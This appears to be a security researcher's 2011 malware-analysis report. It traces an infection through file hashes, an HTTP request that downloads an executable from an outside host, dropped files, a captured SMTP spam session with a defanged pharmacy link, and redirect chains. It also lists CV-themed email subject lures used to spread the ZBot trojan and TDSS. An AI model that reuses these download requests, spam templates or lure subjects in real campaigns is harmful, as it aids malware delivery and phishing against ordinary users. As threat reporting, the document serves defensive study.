SHA1 hash: 7ca0e9f10a3cef8a7cc8b7831f675bd7089648f4
Detection rate: 0 on 9 (0%)

Another executable file is downloaded:

GET /client1.exe HTTP/1.0
Host: tamarer. com
 
HTTP/1.1 200 
Server: Apache
Content-Length: 650240
Content-Type: 
Last-Modified: Sat, 19 Mar 2011 00:55:16 GMT
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Fri, 18 Mar 2011 21:54:54 GMT
Last-Modified:Sat, 19 Mar 2011 00:52:41 GMT
Accept-Ranges:bytes
 
MZ.................

Files created during the infection:

c:\DOCUME~1\ADMINI~1\IMPOST~1\Temp\setup.exe
c:\DOCUME~1\ADMINI~1\IMPOST~1\Temp\MPC5.tmp
c:\WINDOWS\Temp\_ex-68.exe
c:\WINDOWS\system32\Packet.dll
c:\WINDOWS\system32\wpcap.dll
c:\WINDOWS\system32\drivers\npf.sys

Report date: 2011-03-19 02:36:06 (GMT 1)
File name: ex-68-exe
File size: 650240 bytes
MD5 hash: 32f73e995554b8e601c0da661e9a4edb
SHA1 hash: 237cafc9c7c30adee5ac795afd4371fbc19aa41d
Detection rate: 0 on 9 (0%)

Other curious network traffic:

GET /FlopK4F8XFP3oZ1PmQ.htm HTTP/1.1
Host: 98.232.48.112
Content-Length: 594
User-Agent: Mozilla/5.0 (X11; U; NetBSD alpha; en-US; rv:1.8) Gecko/20060107 Firefox/1.5

Now the malware tries to send spam messages:

220 Comendo Mailfence V3
 
HELO XXX
 
250 ec3-node2.net.comendo.com says HELO to XXX:53746
 
MAIL FROM:<xxx@alcatel-lucent.com>
 
250 MAIL FROM accepted
 
RCPT TO:<xxx@lpmail.com>
 
250 RCPT TO accepted
 
DATA
 
354 continue.  finished with "\r\n.\r\n"
 
[...]
 
Subject: Bring extra pleasance to your xxx-life!
 
[...]
 
FDA-approved blue-blu-colored med to heal ED! 
hxxp://healthcontrol. dk/jhkop806.html
 
[...]

So the spam message contains an HTTP link:

healthcontrol. dk/jhkop806.html

That redirects to:

pillrxdrugstorechains. at

URLVoid domain analysis:


Browsers Exploits Delivered as HTML Attachment

We have logged more than 300 email messages with various attached HTML files containing obfuscated JavaScript code that redirects users to download malicious executable files which install the ZBot banking trojan. We also noticed that some HTML files redirected us to external URLs hosting web browser exploit kits that target a few IE, Firefox, PDF and Java vulnerabilities in order to install the TDSS rootkit on our system.

Example message:

Image

Example message:

Image

Example message:

Image

The most used email subjects are:

Please find my CV and cover letter attached.
Attached please find.
Enclosed please find.
Please find enclosed.
Please find CV enclosed.
The resume document is attached.
Enclosed is my CV for your consideration. Thanks
Resume.
My resume Pls.
Read my CV letter attached.
CV ready for you.
Important CV here.
Please take a look at the attached resume.
I have attached the resume.
616-13 like Important Information
Changelog 09.2010
Welcome Letter
Offer on Killington
Here’s that file that you wanted.
Attached file please find.
Please review the attached resume.